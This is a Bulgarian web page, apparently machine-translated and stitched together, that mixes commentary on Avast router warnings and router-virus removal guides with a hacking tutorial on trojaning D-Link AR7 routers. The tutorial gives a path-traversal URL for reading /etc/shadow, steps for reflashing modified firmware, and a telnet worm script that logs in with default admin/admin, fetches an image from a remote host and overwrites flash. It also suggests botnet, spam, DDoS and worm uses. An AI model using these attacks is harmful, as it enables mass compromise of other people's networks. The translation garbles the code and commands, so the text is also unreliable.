Доскоро дори не знаех, че рутерът Avast плаши своите потребители с "страшни" предупреждения по отношение на техните рутери. Както се оказа, антивирусната програма Avast сканира Wi-Fi рутери. Дава резултати, че рутерът не е конфигуриран правилно, устройството е уязвимо за атаки или като цяло, че рутерът е заразен и заразен и нападателите вече са прихванали DNS адреси и успешно ви пренасочват към злонамерени сайтове, крадат информация за кредитни карти, и като цяло всичко е много зле. Всички тези предупреждения, разбира се, са подправени с опасен червен цвят и объркващи инструкции, които дори добър специалист няма да разбере без бира. Не говоря за обикновените потребители. Ето как изглеждат проблемите, открити на рутера D-Link DIR-615:
Устройството е уязвимо на атаки:
От решенията, разбира се, актуализиране на фърмуера на рутера. За какво друго 🙂 Avast може също да покаже съобщение, че вашият рутер е защитен със слаба парола или че рутерът не е защитен от хакване.
В някои случаи можете да видите съобщение, което вашият рутер е заразени връзките се пренасочват към злонамерен сървър. Avast Antivirus обяснява това, като казва, че вашият рутер е бил хакнат и неговите DNS адреси са били променени на злонамерени. Освен това предоставя инструкции за решаване на този проблем за различни рутери: ASUS, TP-Link, ZyXEL, D-Link, Huawei, Linksys / Cisco, NETGEAR, Sagem / Sagemco.
Накратко, всички тези препоръки са насочени към проверка на DNS адреси и услуги, свързани с DNS. Чрез които нападателите могат да променят DNS на вашия рутер и да ви пренасочат към техните злонамерени сайтове. Има подробни инструкции как да проверите всичко на рутери от различни производители.
Как да отговоря на предупреждение от Avast за уязвимост на рутера?
Мисля, че всеки се интересува от този въпрос. Особено ако сте попаднали на тази страница. Ако се чудите как бих реагирал на подобни предупреждения от антивирусната, то отговорът е лесен – няма как. Сигурен съм, че Avast щеше да намери дупки в рутера ми, през които да бъда хакнат. Просто имам Dr.Web. Той не прави тези проверки.
Може би греша, но никоя друга антивирусна програма освен Avast не проверява Wi-Fi рутерите, към които сте свързани, за различни видове уязвимости. И тази функция, наречена Home Network Security, се появи още през 2015 г. Във версията на Avast 2015 г.
Avast сканира рутера за проблеми със сигурността на устройството. Обаче не разбирам напълно как го прави. Например как проверява същата парола за влизане в настройките на рутера. Следва потребителя или метода на избор? Ако сте я взели, паролата е лоша 🙂 Е, добре, не съм програмист.
Лично аз вярвам, че всички тези предупреждения не са нищо повече от прости препоръки за укрепване на защитата на вашия рутер. Това не означава, че някой вече ви е хакнал и ви е откраднал данните. Какво предлага Avast:
- Задайте добра парола и актуализирайте фърмуера на рутера. Казват, че иначе можете да бъдете хакнати. Добре, това е разбираемо. Не е необходимо да се сигнализира като някаква страшна уязвимост. Въпреки че отново не разбирам как антивирусната определя, че версията на софтуера на рутера е остаряла. Струва ми се, че това е невъзможно.
- Рутерът не е защитен от връзки от интернет. Най-вероятно такова предупреждение се появява след проверка на отворени портове. Но по подразбиране на всички рутери функцията "Достъп от WAN" е деактивирана. Силно се съмнявам, че някой ще хакне вашия рутер през интернет.
- Е, най-лошото е подмяната на DNS адреси. Ако бъдат открити проблеми с DNS, Avast вече директно пише, че "Вашият рутер е заразен!". Но в 99% от случаите не е така. Отново почти винаги рутерът автоматично получава DNS от доставчика. И всички функции и услуги, чрез които нападателите могат по някакъв начин да променят DNS, са деактивирани по подразбиране. Струва ми се, че много често антивирусът "разбира" някои потребителски настройки неправилно.
Нещо като това. Разбира се, може да не се съгласите с мен. Струва ми се, че е много по-лесно да влезеш директно в компютър и да го заразиш, отколкото да го направиш с рутер. Ако говорим за атака през интернет. Ще се радвам да видя вашето мнение по този въпрос в коментарите.
Как да защитим рутера и да премахнем предупреждението от Avast?
Нека се опитаме да се справим с всеки елемент, който Avast най-вероятно проверява и издава предупреждения.
- Рутерът е защитен със слаба парола. Няма криптиране.В първия случай антивирусът има парола, която трябва да въведете, когато влизате в настройките на рутера. Обикновено паролата по подразбиране е admin. Или изобщо не е инсталиран. И се оказва, че всеки, който е свързан към вашата мрежа, може да влезе в настройките на рутера. Следователно тази парола трябва да се промени. Как да направя това, написах в статията:. Що се отнася до паролата за Wi-Fi мрежа, тя също трябва да е силна и трябва да се използва WPA2 тип криптиране. Винаги пиша за това в инструкциите за настройка на рутери.
- Рутерът е уязвим поради стар софтуер.Това не е съвсем вярно. Но ако има нов фърмуер за вашия модел рутер, тогава е препоръчително да го актуализирате. Не само за подобряване на сигурността, но и за по-стабилна работа на устройството и нови функции. На уебсайта имаме инструкции за актуализиране на софтуер за рутери от различни производители. Можете да намерите чрез търсенето или да попитате в коментарите. Ето за.
- DNS настройките са променени. Рутера е хакнат.Честно казано не съм виждал такива случаи. Както писах по-горе, всички услуги, чрез които това може да се случи, са деактивирани по подразбиране. Най-често рутерът автоматично получава DNS от доставчика. Единственият съвет, който мога да дам, е да не въвеждате ръчно DNS адреси, за които не сте сигурни. И ако зададете адреси ръчно, тогава е по-добре да използвате само DNS на Google, който: . Това се препоръчва и в препоръките на Avast, които можете да видите на официалния уебсайт:. Има подробни инструкции за решаване на DNS проблеми за почти всички рутери.
Това е всичко. Надявам се, че успях поне да изясня тези предупреждения в антивирусната програма Avast. Задавайте въпроси в коментарите и не забравяйте да споделите полезна информация по тази тема. Късмет!
Здравей мой читателю! В тази статия ще говоря за прекрасни ADSL рутери.
- незаменими железа в битови и индустриални мрежи. Ще ви разкажа за въпроса
експлоатация на тези парчета желязо за полезни за нас цели - шиене в брутално
Троянски кон в рутера. И то така, че никой да не го забележи
интелигентен администратор, без потребител с големи уши.
Желания или изисквания за IQ
Когато написах тази статия, предположих, че ще е достатъчно да я прочета
напреднал потребител с инсталиран GNU\Linux, който също има някои умения
работа и програмиране в тази операционна система. Въпреки това изглежда
възможно е да повторя стъпките си в Windows (с помощта на Cygwin, например), но
няма да се описва. За максимално удоволствие се нуждаете и от
умения за поялник (това не е задължително).
И всичко започна...
Нещо, което се отклоних. И така, всичко започна с това как един ден това много
парче желязо, или по-скоро коварно прекъсна връзката с интернет и не го направи
искаше да го възстанови. В същото време тя беше далеч, физически достъп
тя не беше там (обаче излъгах за нещо - просто ме мързеше да стана от дивана
рестартирайте рутера :)), уеб интерфейсът не реагира, но го запомних на
това нещо трябва да е telnet или ssh. Влезте в административната зона
не бях опитвал преди това и безразсъдно промених паролата за моя акаунт (както
по-късно се оказа напразно, защото по подразбиране е "admin: admin"). И аз
пробвах SSH и се получи!
$ ssh [имейл защитен]
$Password:
Като гръм от ясно небе! Busybox! Никога не съм мислил под чия
този рутер контролира, оказва се - GNU / Linux! изплаших се
Чудя се как работи всичко тук и, психически, благодарение на мързел и случайност, аз
се зае с изследване.
Събиране на информация
И така, откъде започнах? Разбира се, от списъка с налични команди:
#busybox
...
Текущо дефинирани функции:
[, ash, busybox, cat, chgrp, chmod, chown, cp, date, dd, df, echo, false, free,
grep, име на хост, id, ifconfig, init, insmod, kill, ln, вход, ls, lsmod, mkdir,
modprobe, монтиране, mv, passwd, ping, ps, pwd, рестартиране, rm, rmmod, маршрут, sh, заспиване,
синхронизиране, tar, тест, tftp, докосване, вярно, tty, umount, wget, whoami, да
Комплектът е съвсем нормален, достатъчен за нормално проучване и реализиране на идеи.
След това се появи интерес към версията на ядрото:
# cat /proc/version
Linux версия 2.4.17_mvl21-malta-mips_fp_le ( [имейл защитен]) (gcc версия 2.95.3
20010315 (версия/MontaVista)) #1 четвъртък, 28 декември 05:45:00 CST 2006
За справка: MontaVista е дистрибуция, фокусирана върху вградените
системи. По-голямата част от производителите на мрежово оборудване раздават
предпочитание към тази система. Може да се намери и на други устройства, например в
електронни книги или мобилни телефони.
# cat /etc/versions
КЛИЕНТ=DLinkRU
МОДЕЛ=DSL-500T
ВЕРСИЯ=V3.02B01T01.RU.20061228
HTML_LANG=EN.302
БОРДА=AR7VW
VERSION_ID=
CPUARCH_NAME=AR7
MODEL_ID=
FSSTAMP=20061228055253
# cat /proc/cpuinfo
процесор
: 0
модел на процесора
: MIPS 4KEc V4.8
BogoMIPS
: 149.91
изчакайте инструкция: не
микросекундни таймери: да
допълнителен вектор за прекъсване: да
хардуерна точка за наблюдение: да
VCED изключения: не са налични
VCEI изключения: не са налични
AR7 е двуядрен чип, разработен от Texas Instruments. Той
съдържа пълноценен ADSL рутер на един чип, който поддържа ADSL1 стандарти,
ADSL2,ADSL2+. Базиран на високопроизводителен MIPS 4KEc RISC процесор, с
тактова честота 175 или 233 (в зависимост от производствената технология: 18 µm
или 13 µm). Чипът съдържа 2 UART интерфейса на борда, единият от които (UART_A)
използван за извеждане на информация за отстраняване на грешки, както и EJTAG интерфейс, който служи
за отстраняване на грешки (фърмуер) Flash памет. За използването на тези интерфейси ще бъде
описани по-долу.
Накрая погледнах информацията за паметта:
# cat /proc/mounts
/dev/mtdblock/0 / squashfs ro 0 0
няма /dev devfs rw 0 0
proc /proc proc rw 0 0
ramfs /var ramfs rw 0 0
# cat /proc/mtd
dev: размер изтриване размер име
mtd0:0034f000 00010000 "mtd0"
mtd1:00090f70 00010000 "mtd1"
mtd2: 00010000 00002000 "mtd2"
mtd3: 00010000 00010000 "mtd3"
mtd4: 003e0000 00010000 "mtd4"
Естествено, без да забравяме за блоковите адреси:
# cat /proc/ticfg/env | grep mtd
mtd0 0x900a1000,0x903f0000
mtd1 0x90010090,0x900a1000
mtd2 0x90000000.0x90010000
mtd3 0x903f0000,0x90400000
mtd4 0x90010000,0x903f0000
От горното следва, че флаш паметта (/dev/mtdblock) има 5 блока:
mtd0- Изображение на файловата система SquashFs. Това е специален файл
система, която е компресирана и само за четене. За
алгоритъмът за компресия е gzip, но в този случай е LZMA (коефициент на компресия
по-горе). Размерът на този блок е 4 MB.
mtd1– този блок съдържа ядрото на MontaVista, компресирано от алгоритъма LZMA
състояние, размер на блока 600 Kb.
mtd2– Bootloader ADAM2, изпълнява зареждане на ядрото, също има
обслужващ FTP сървър за възстановяване и флашване. Повече за това ще бъде
каза още. Размерът на блока е 64 KB.
mtd3– споделени между конфигурационни данни и среда
(променливи на средата), който може да се види в /proc/ticfg/env.
Конфигурационните данни са в /etc/config.xml. Посредник между файла
блокът за системна конфигурация е затворен (както всички cm_*, които контролират, o
тях по-късно) програма cm_logic. Размерът на този блок също е 64 KB.
mtd4- това съдържа подписа на фърмуера, ядрото и изображението на файла
системи. Този блок се използва при актуализиране на фърмуера чрез уеб интерфейса.
Първоначално се съхранява в този блок, след което се проверява контролната сума
и ако се сближи, се записва на новото си местоположение.
RAM (16 MB в този модел, но ADAM2 в този модел
вижда само 14 MB, третира се с актуализация), се монтира в директорията /var и
може безопасно да се използва за нашите цели:
# Безплатно
общо използвани безплатни споделени буфери
Mem: 14276 10452 3824 0
Нека не забравяме да прегледаме списъка с процеси. От интересното, което дебне тук
демони: thttpd - уеб сървър; dproxy - кеширане на DNS заявки прокси сървър; ddnsd
- DNS демон pppd... - действителният демон, който реализира връзката на протокола
PPP, а в параметрите виждаме информация за акаунта. Така че, ако рутерът не е
прави се на маркуч (да се чете - не е в мостов режим), тогава можете
лесно да получите акаунт.
Програмите cm_* са патентовани и вече са включени в изходните кодове.
компилирани (тези програми също са разработени от Texas Instruments, на D-Link
няма нужда да се кълнете за неспазване на лицензите).
cm_logic- програма, която управлява логиката на системата, чрез нея
преминава конфигурацията; синхронизира /etc/config.xml с
съответната част от съдържанието на /dev/ticfg (сочеща към mtd3).
cm_cli– интерфейс на командния ред за управление и конфигуриране
системи. Например, настройките за връзка се правят през този интерфейс.
cm_pc– стартира и следи процеси, връзки с правила
(например стартирайте програмата като демон, правилата също включват информация за
портове за отваряне), както е описано в /etc/progdefs.xml; зареден веднага след това
ядки.
webcm– CGI интерфейсът е пълен с дупки, например ви позволява да гледате /etc/shadow,
просто чрез достъп до URL адреса.
http://192.168.1.1/../../../etc/shadow
Нямам нищо, thttpd не е толкова прост, но ако е така:
http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow
Още нещо. Това може да се използва за събиране на информация, ако няма достъп до
ssh/telnet, но има достъп до уеб интерфейса.
firmwarecfg- използва се за флашване през уеб интерфейса. На входа
на тази програма изображението се предава чрез POST заявка от уеб интерфейса и то вече е
пренасочва към Flash-паметта след проверка на контролната сума на изображението.
Това завършва събирането на първична информация, време е да преминем към решаваща
действия.
Инсталиране на инструменти за разработка и компилиране на фърмуер
Фърмуер за D-Link рутери (и всички други, базирани на GNU/Linux)
разпространявани под GPL лиценз, можете да ги получите на официалния
FTP сървър. Всъщност можете да изберете всеки от списъка с предложен фърмуер,
еднакви са (относно Т-серията). В доставката - изходният код на ядрото, среда,
необходими инструменти и инструментална верига за разработване/компилиране на съществуващи
програми. Трябва да се разопакова до корена и да се добави към променливата на средата
PATH път към директорията bin на toolchain:
$ tar xvf tools.tgz
$ export PATH=$PATH:/opt/
Сега, за да компилирате свой собствен фърмуер, отидете в директорията
с изходни кодове и изпълнете същия make.
$ cd DSL/TYLinuxV3/src && make
Ще бъдат зададени много въпроси относно активирането на поддръжката на устройството (по-добре
отговорете им утвърдително). В края на компилацията в директорията TYLinuxV3/images
ще бъдат създадени изображения на фърмуера. Можете също така да стартирате скрипт със същото име като вашето.
модел от директорията /TYLinuxV3/src/scripts.
Няколко думи за прехвърлянето на файлове между рутер и компютър. Най-първият
методът, който използвах, е възможността за прехвърляне на файлове чрез SSH протокола,
използвайки програмата scp за това. Но малко по-късно разбрах, че mc (Midnight
Commander) също има възможност за свързване чрез SSH (Panel -> Shell връзка).
Като алтернатива можете да настроите уеб или FTP сървър на работното си място. По-късно аз
даде предпочитание на уеб сървъра, защото работи най-бързо. инсталирах
thttpd, малък и бърз, точно като на рутер. Пускаме у дома и дърпаме
рутер файл, след като отидете в директорията /var (тя, както беше споменато
налични преди това за запис).
$ thttpd -g -d ~/ForRouter -u потребител -p 8080
# cd /вар
# wget http://192.168.1.2/файл
За да изтеглите файл от рутера, можете също да повдигнете уеб сървъра:
# thttpd -g -d /var -u root -p 8080
Обърнете внимание, ако искате да изтеглите изпълним файл от рутера, трябва
премахнете правата за стартиране. При изтегляне на голям брой файлове от рутера
по-добре е да използвате mc, няма да е необходимо първо да копирате файловете в /var и
премахнете правата и след това изтрийте тези файлове, за да освободите място. Като цяло въпросът
вкус, изберете всяка опция, която е удобна за вас.
Създаване на собствена програма
Да започнем, разбира се, с класиката на програмирането - HelloWorld. Някои специални
няма правила. Текстът на програмата е до болка познат:
#включи
#включи
int main(void)
{
printf("Mate.Feed.Kill.Repeat.");
връщане 0;
}
Ние компилираме (пътя към инструменталната верига "и трябва да бъде посочен в променливата на средата
ПЪТ:
$ mips_fp_le-gcc hell.c -o ада
$ mips_fp_le-strip -s ад
# cd /вар
# chmod +x по дяволите
# ./по дяволите
И ... нищо няма да се случи или известието за ненамерен път ще изпадне. Какво е
бизнес? Вече говорих за cm_pc по-рано - тази програма стартира други
според правилата, описани в /etc/progdefs.xml. Тук идва моментът
модифицирайте и флашвайте изображенията на файловата система.
Модификация на файловата система
За да промените файловата система, първо трябва
разопаковам. Както споменах, файловата система тук е SquashFs с LZMA кръпка.
Пакетът за разработка на фърмуер включва само програмата mksquashfs (за създаване
изображение), unsquashfs (за разопаковане) липсва. Но няма значение, всичко е налично
на уебсайта на файловата система, имаме нужда от първата версия. Чрез прилагане на пластира LZMA и
след като събрахме комунални услуги, ние ги оставихме настрана на удобно място. Първо, нека получим изображение
файлова система от рутера:
# cat /dev/mtdblock/0 > /var/fs.img
$ mkdir unpacked_fs
$unsquashfs fs.img unpacked_fs
Сега можете да променяте както желаете, но ние искаме да включим FuckTheWorld
директория /bin и добавете правило за изпълнение в /etc/progdefs.xml.
$ cp здравей unpacked_fs/bin
$ vim unpacked_fs/etc/progdefs.xml
И добавете това (между таговете
Запазете и опаковайте обратно:
$ mksquashfs unpacked_fs my_fs.img -noappend
Имайте предвид, че изображението на файловата система не трябва да надвишава
допустими размери. Ако ви се прииска да опитате нещо спешно, но не става
пасва, премахнете от изображението нещо "ненужно" като grep, whoami или
използвайте пакета за изпълним файл UPX. Сега качете на рутера
изображение и преминете към следващия раздел.
Заснемане на изображение на файловата система
Начинът за мигане на рутера е много прост, той се състои в достъп до устройството
/dev/mtdblock/*. Така че, качете изображението на файла в рутера по всеки удобен начин.
система и изпълнете това просто действие:
# cat my_fs.img > /dev/mtdblock/0 && рестартиране
# cp my_fs.img /dev/mtdblock/0 && рестартиране
След известно време, когато процесът на запис приключи, рутерът ще се рестартира и
промените ще влязат в сила. Нека се опитаме да изпълним нашия пример:
#ад
Mate.Feed.Kill.Repeat.
Начини за възстановяване в случай на повреда
Преди да мигате рутера с по-сериозни "занаяти", трябва да научите как
действайте в критични случаи, когато рутерът откаже
натоварване. Няма безнадеждни ситуации. ADAM2 FTP сървър идва на помощ. За
първо трябва да стартирате FTP клиента на ADAM2 IP адреса, който може да бъде надникнат
в /proc/ticfg/env (параметър my_ipaddress).
$ ftp 192.168.1.199
220 ADAM2 FTP сървър готов.
530 Моля, влезте с USER и PASS.
За по-голяма яснота можете да включите режима за отстраняване на грешки, след това всички
информация и всички FTP отговори:
Вход / парола - adam2 / adam2. Процесът на мигане е много прост. Да започна
променете FTP сесията в двоичен режим:
ftp> цитирам MEDIA FLSH
Сега изпращаме например изображение на файловата система и посочваме местоположението
дестинация:
ftp> поставете fs.img "fs.img mtd0"
Чакаме края на записа, рестартирайте рутера, излезте от сесията:
ftp> цитирам РЕСТАРТИРАНЕ
ftp>излезте
Всичко! Както можете да видите, няма нищо трудно, сега, ако нещо се обърка, вие
винаги можеш да оправиш нещата.
За удобство трябва да дадете нормален IP адрес, активирайте
автоматично изтегляне (за да не танцувате с нулиране) и леко увеличете времето
изчакване на връзка преди зареждане на ядрото. Всички тези настройки се съхраняват в
променливи на средата, има специални ADAM2 FTP команди: GETENV и SETENV (за
получаване и задаване на променлива, съответно). Във FTP сесията въведете следното
команди:
ftp> SETENV автоматично зареждане,1
ftp> SETENV autoload_timeout,8
ftp> SETENV my_ipaddress,192.168.1.1
ftp> цитирам РЕСТАРТИРАНЕ
ftp>излезте
Рутерът се рестартира и можете да отидете на ADAM2 на 192.168.1.1:21. Ако
ще има желание да презаредите изображението на ядрото и ядрото ще откаже да стартира, FTP
ще започне от само себе си. Преди да мигате с модифицирани изображения, не забравяйте да
запазете текущите за възстановяване. Като цяло можете да промените променливите на средата
и чрез /proc/ticfg/env, просто исках да говоря повече за работата с FTP.
# echo my_ipaddress 192.168.1.1 > proc/ticfg/env
И можете да проверите промените по следния начин:
# cat /proc/ticfg/env | grep my_ipaddress
Какво да направите, ако искате да опитате да флашнете буутлоудъра и как
действа в случай на неуспех? Или рутерът по някаква причина не стартира и
няма достъп до ADAM2? Има изход - JTAG или по-скоро EJTAG присъства в този чип
(разширена версия). Това е интерфейс за вътрешносхемно отстраняване на грешки/програмиране.
За да се свържем с този интерфейс, се нуждаем от LPT порта на компютъра,
конектори и 4 резистора. Схемата е проста.
Бързам да отбележа, че фърмуерът чрез JTAG не е бърз бизнес, ще отнеме достатъчно
много време. Така че трябва да се използва само за възстановяване на буутлоудъра,
дори и да не работи. За да комуникирате чрез JTAG, трябва да използвате специален
програма като UrJTAG. По-долу е даден пример как работи този интерфейс.
Настройка на комуникацията:
jtag> паралелен кабел 0x378 DLC5
jtag> откриване
Откриване на флаш памет:
jtag> detectflash 0x30000000 1
Четене на флаш памет:
jtag> readmem 0x30000000 0x400000 fullflash.img
Записване в паметта (bootloader):
jtag> flashmem 0x30000000 adam2.img
Също така е полезно да знаете за UART интерфейса (обещах да говоря за него по-рано). AT
UART_A отчети, тоест регистрационните файлове на буутлоудъра (в ранен етап на зареждане от
можете да говорите с него) и ядрото. Когато пишете модифицирани ядра, това
незаменим за отстраняване на грешки. UART - Универсален асинхронен приемник/предавател
(универсален асинхронен приемо-предавател) почти винаги присъства на
микроконтролери.
Схемата на адаптера е много проста. Въз основа само на един чип -
Конвертор на ниво TTL: MAX232 за COM и FT232R за USB. Микросхеми
са доста често срещани и няма да има проблеми с покупката.
Веригата е сглобена на макетна платка (която може безопасно да се постави в кутия
конектор за COM порт) за 20 минути и носи много предимства. Например при отстраняване на грешки
Ядките са абсолютно незаменимо решение. И ако електрониката е стегната? Изход
са USB кабели за стари телефони, просто имат конвертор
UART - USB.
Някои идеи за разпространение
Вашият прокси/чорап на рутер на някой друг е страхотен. Както всъщност и спам
над всички протоколи рутер. Това не е компютър с Windows за вас.
пренареждам всеки месец :). Рутерите често не се променят или презареждат. да и
на кого освен нас би му хрумнала идеята да зарази рутер?
Не забравяйте, ние контролираме целия трафик от потребителя/мрежата. За още
мощни рутери и вече е възможно да закачите DDOS бот. Скриване на файл/скриване на процес,
прихващане на запис в mtd блокове, елиминиране на изтриването на нашата програма - всичко, което
както и да е!
Да кажем, че ще започнете да пишете сериозна програма за рутер.
Много доброто отстраняване на грешки е важно, вероятно ще трябва да го правите много пъти
пренаписване/възстановяване на изображения... Това е много тъжна перспектива. Дори ръцете
малко по-ниско, ако вземем предвид и ресурса за презапис на Flash паметта
малък (повече подробности в документацията за чипа памет), и има перспектива
зарежи я. Но има изход! Qemu може да емулира AR7! Представяте ли си какво
предоставя ли възможности и неограничено удобство? Сега няма какво да ни спре
напиши нещо невероятно готино!
Така. Написал си програма, проверил си я на своя или на 1-2 чужди рутера, но
цялата мрежа е още напред, ръчното заразяване е скучна работа, на 10-ия рутер вече започваш
проклина целия свят и плува в очите от струните на "котка" и "mtd". Да пишем
програма за автоматизиране на тези рутинни действия. Избрах езика Python.
Работният план е:
- съставяне на списък с рутери, например с помощта на nmap;
- скриптът трябва да вземе IP адреси от списъка по ред, въведете през
telnet със стандартно влизане/парола; - след това същите действия: качете модифицираното изображение,
презаписване, рестартиране.
#!/usr/bin/env python
#Кодиране=UTF-8
импортиране на telnetlib, време
СЪРВЪР="http://anyhost.com/fs.image"
за addr в open("iplist.txt"):
telnet = telnetlib.Telnet(addr)
telnet.set_debuglevel(1)
telnet.read_until("вход:")
time.sleep(5)
telnet.write("admin\n")
telnet.read_until("Парола:")
telnet.write("admin\n")
telnet.read_until("#")
telnet.write("cd /var && wget " + СЪРВЪР)
telnet.read_until("#")
telnet.write("cat fs.image > /dev/mtdblock/0")
telnet.read_until("#")
telnet.write("рестартиране")
telnet.close()
Логиката на сценария е много далеч от идеалната, сега ще обясня защо. За
първо трябва да проверите версията на фърмуера/ядрото и модела на рутера, защото може да има
големи разлики в производителността. Освен това, вместо заготовки на фърмуера, трябва да изтеглите
изображение на файловата система от рутера, разопаковайте, модифицирайте и изпратете
обратно. Това ще премахне проблемите със съвместимостта с различни
модели / версии на фърмуера, защото стабилността на работа е най-важното нещо за вас.
Освен това вирусът може да има функциите на червей и ако желаете, винаги можете
прикачете мрежов скенер към него, груба сила за RDP и подобни чипове.
Има и друг чудесен метод за разпространение. Нищо не ви пречи да пишете
програма за Windows, която ще имате с вас (или изтеглете от вашия
сървър) изображение на файловата система и заразете рутера с него, ако има такъв.
Разпространете тази програма по всички "стандартни" начини: сменяеми устройства,
експлойти за програми, заразяване на други програми... Комбинирането на тези методи,
може да бъде голяма пандемия. Само си представете тази картина
такива устройства са повсеместни.
Защита на рутера
След като разрових всичко това, си помислих: как мога да защитя рутера? И тогава, виждате ли,
Ще се намеря сам. Първата стъпка е да промените потребителската парола на по-сложна и
дълги (ограничение - 8 знака), промяна на банери и сервизни поздрави
(с шестнадесетичен редактор или, за предпочитане, прекомпилиране на програми), за да
nmap или други скенери не можаха да определят версиите на услугите.
Трябва също да промените портовете, на които висят демоните. Това става чрез
модификации на progdefs.xml. Убийте telnet (най-лесният начин да вземете парола за него, да
и протоколът е несигурен, защо ни е необходим), включете защитната стена, разрешете връзката
към услуги само от собствения си IP или MAC адрес. Използвайте и защитна стена
за защита на мрежа или компютър, не напразно го има. Компетентна настройка
Правилата винаги ще помогнат за защита.
Заключение
Изградени са много, не само D-Link рутери и други подобни устройства
AR7 чип, списъкът включва Acorp, NetGear, Linksys, Actionec... Доста
този AR7 е популярен заедно с MontaVista. От това следва, че, използвайки същ
toolchain, без никакви проблеми можете да изпълните стъпките, описани в статията.
Помислете за това: в допълнение към вредните действия, можете да направите и нещо полезно / приятно за себе си.
и други (не споря, удоволствието от хакването не може да бъде заменено, но все пак).
Можете да направите свой собствен фърмуер, например по-мощни рутери, способни на
изтегляне / разпространение на торенти ... Всички модели имат USB 1.1 интерфейс, но в по-младите
модели не е запоен. Добавете USB модул и драйвер за файлова система към ядрото,
оборудвайте рутера с флаш памет - и в резултат на това получавате един вид мрежово хранилище за
малко пари. Има много опции и идеите трябва да възникнат хиляди - не
ограничавайте се, творете и творете!
В светлината на нарастващите случаи на подправяне на DNS от зловреден софтуер на устройствата на интернет потребителите, възниква въпросът за сигурността на Wi-Fi рутерите. Как да проверите рутера за вируси? Как да премахнете вирус в рутер? Въпросът е сложен и прост едновременно. Има решение!
Самият вирус не може да се запише на повечето съвременни рутери поради малкото място в паметта на самия рутер, но може да зомбира рутера, за да участва в ботнет. По правило това е ботнет, който да атакува различни сървъри или да пренасочва и анализира потока от информация, която ви оставя в интернет.
Вашите пароли и лична кореспонденция могат да попаднат в ръцете на натрапници!
Това трябва да се коригира възможно най-скоро.
- Нулирайте настройките на рутера
- Фърмуер на рутера
- Преконфигуриране
Нулирайте настройките на рутера
Можете да нулирате настройките на рутера, като натиснете бутона за нулиране. Обикновено този бутон се намира на гърба на рутера, където са LAN портовете. Обикновено бутонът е вдлъбнат в дупка, за да се избегне случайно натискане, така че трябва да използвате клечка за зъби. то ще изтрие настройките на рутера, променени от вируса, и ще инсталира фабричните на тяхно място. Трябва да ви предупредя, че ако не знаете как да конфигурирате рутер, тогава сметищенеговите настройки за вас не си заслужава!
Фърмуер на рутера
Понякога вирусът "наводнява" модифициран фърмуеркъм рутера. Можете да премахнете вирусния фърмуер от рутера, като флашнете отново рутера.
Свържете компютъра към рутера с LAN кабел. LAN кабелът е включен към всеки рутер. Или чрез Wi-Fi, ако няма възможност за кабелна връзка. По-добре е да се свържете с кабел!Безжичната връзка се счита за нестабилна и не е подходяща за фърмуера на рутера.
След като сме се свързали с рутера, отворете браузъра (Chrome, Opera, Mozilla, IE) и въведете адреса на ASUS рутера в адресната лента, за Asus е 192.168. Вход: admin, Парола: admin. Ако потребителското име и паролата не пасват, попитайте човека, който е настроил вашия рутер, може би той ги е променил.
Изтеглете фърмуера от уебсайта на производителя и изберете фърмуера на диска, като използвате страницата с настройки на рутера. За по-голямата част от рутерите стъпките на фърмуера са еднакви.
Проблеми при разпространението на Wi-Fi с помощта на рутер възникват по различни причини. Един от тях е заразяването на разпределителното устройство с вирус, от който можете да се отървете сами.
- вирус, който забавя скоростта на интернет по различни начини. Например такъв злонамерен софтуер събаря настройките на фърмуера или започва да изтегля рекламно вирусно съдържание на компютъра;
- вирус, който замества адресите на уебсайтове. Изглежда така: потребител посещава всеки известен безопасен сайт и вирусът променя DNS по такъв начин, че потребителят стига до рекламен сайт или вижда рекламни банери, където собствениците на сайта не са ги поставили. Такъв вирус също е опасен, защото може да ви прехвърли на сайт, съдържащ други вируси.
Във всеки случай, ако забележите неправилната работа на рутера, трябва да го проверите за вируси, особено след като е много лесно да се отървете от тях.
Как вирусът влиза в рутер
Рутерът осигурява интернет на всички свързани към него устройства. Това означава, че всички устройства и самият рутер са в една и съща домашна мрежа. Ето какво използва вирусът: влиза в компютъра от някакъв сайт или изтеглен файл и след това се предава по мрежата до рутера, където започва да прави мръсни номера. Процесът зависи от модела на вируса, например някои зловреден софтуер не се откриват конкретно на компютъра, но започват да действат само когато влязат в рутера, докато други успяват да навредят едновременно на операционната система и фърмуера на рутера време.
Проверка на рутера
Преди да почистите рутера от вируси, трябва да проверите дали те са на него. За да разберете резултата, трябва да използвате интернет директно през компютър. Тоест извадете WLAN кабела или модема от рутера и го поставете в порта на компютъра, след което изпълнете следните стъпки:
Ако имате проблеми със скоростта, следвайте тези три стъпки.
- Проверете скоростта на интернет. Това трябва да се направи, за да разберете в бъдеще дали скоростта е еднаква при използване на мрежата директно и през рутер. Например, можете да изтеглите файл или да използвате специалната онлайн услуга Speedtest.
Ние сканираме скоростта на интернет чрез сайта Speedtest
- За да определите по-точно качеството на сигнала, трябва да знаете скоростта на ping. Ping е времето, необходимо на сигнала да бъде изпратен от вашето устройство, да достигне до сървъра и да се върне обратно. Естествено, колкото е по-голямо, толкова по-зле е за вас. Отворете командния ред, въведете командата ping ip и я изпълнете. IP адресът на вашата връзка, по подразбиране обикновено е 192.168.0.1, но може да варира. Запомнете резултата. Нормална стойност на ping до 40 ms е отличен показател, 40-110 ms е нормална средна стойност, повече от 110 ms - трябва да помислите за преконфигуриране на мрежата, подобряване на сигнала или смяна на доставчика.
Изпълнете командата ping ip
- След списъка с изпратени пакети ще видите статистика. Интересувате се от реда „Пакети“, той брои колко пакета са изпратени, изгубени, завършени. Ако броят на загубените пакети надвишава 5%, трябва да разберете какъв е проблемът. Ако голям брой пакети не достигнат сървъра или не се върнат, това ще повлияе значително на скоростта на интернет.
Вижте какъв процент от пакетите са загубени
След като опишете всички горни стъпки, получете подробна информация за ping, броя на загубените пакети и скоростта на интернет, свържете отново WLAN кабела или модема към рутера и проверете всички същите индикатори, когато сте свързани чрез Wi-Fi. Ако параметрите са приблизително на същото ниво, тогава проблемът не е в рутера, може би причината е от страна на оператора. В противен случай, ако проблеми с интернет възникнат само когато го използвате през рутер, трябва да извършите фабрично нулиране и почистване от вируси.
Премахване на вируси
За да премахнете вируса, трябва да върнете настройките към стойностите по подразбиране. Ако вирусът е успял да повреди фърмуера, ще трябва да го инсталирате отново сами.
Опции за нулиране
- Потърсете бутона Reset на гърба на рутера. Обикновено е по-малък от всички останали. Трябва да се задържи за 10-15 секунди. Когато рутерът се изключи и започне да се рестартира, можете да го освободите. Рестартирането на рутера ще ви уведоми, че настройките са нулирани. Моля, имайте предвид, че зададената парола също ще бъде загубена.
Натиснете бутона Reset
